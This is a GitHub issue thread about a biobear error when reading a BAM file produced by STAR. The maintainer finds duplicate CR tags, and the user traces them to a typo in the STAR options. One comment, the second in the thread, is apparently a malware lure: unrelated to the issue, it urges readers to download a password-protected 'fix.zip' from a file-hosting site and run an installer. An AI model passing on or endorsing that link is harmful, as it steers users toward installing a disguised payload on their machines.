### ISSUE TITLE
read bam error

### ISSUE THREAD

**Issue by Liripo** [wheretrue/biobear#171]
error :
```
ArrowInvalid: C Data interface error: External error: Arrow error: External error: Io error: invalid data"
```
code: 
```python
import biobear as bb

session = bb.connect()

session.sql("""
    CREATE EXTERNAL TABLE experiment STORED AS BAM LOCATION 'Aligned.sortedByCoord.out.bam'
""")

result = session.sql("""
    SELECT start FROM experiment
""")

result.to_polars()
```

`Aligned.sortedByCoord.out.bam` is generated by STAR

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Liripo** [comment]
? @PiaoR

**Comment by tshauck** [comment]
@Liripo Thanks for posting this, I'll have a look and follow up.

**Comment by Liripo** [comment]
<https://drive.google.com/file/d/10zXT2zc1iQJ9y5jY_CeInGKF2LD_o51N/view?usp=sharing> This is an example of a 6M bam file.

**Comment by tshauck** [comment]
Thanks! -- it looks like this has duplicate `CR` tags, is that expected with STAR? (I'm not that famailiar with it as a tool).

According to the BAM file standard, there shouldn't be duplicate tags:

<img width="840" alt="image" src="https://github.com/user-attachments/assets/f7c25d1b-358d-41e1-86b8-f1b509687834"> https://samtools.github.io/hts-specs/SAMv1.pdf

I'll try to make that error bubble up in the mean time.

**Comment by Liripo** [comment]
Thanks for your help. I typed an extra CR tag in the STAR command line option. A clearer error message would be better.
```
STAR --outSAMattributes CR CR
```

**Comment by tshauck** [comment]
Great, I'll go ahead and close this then. Please feel free to open more issues if you have issues and/or questions.
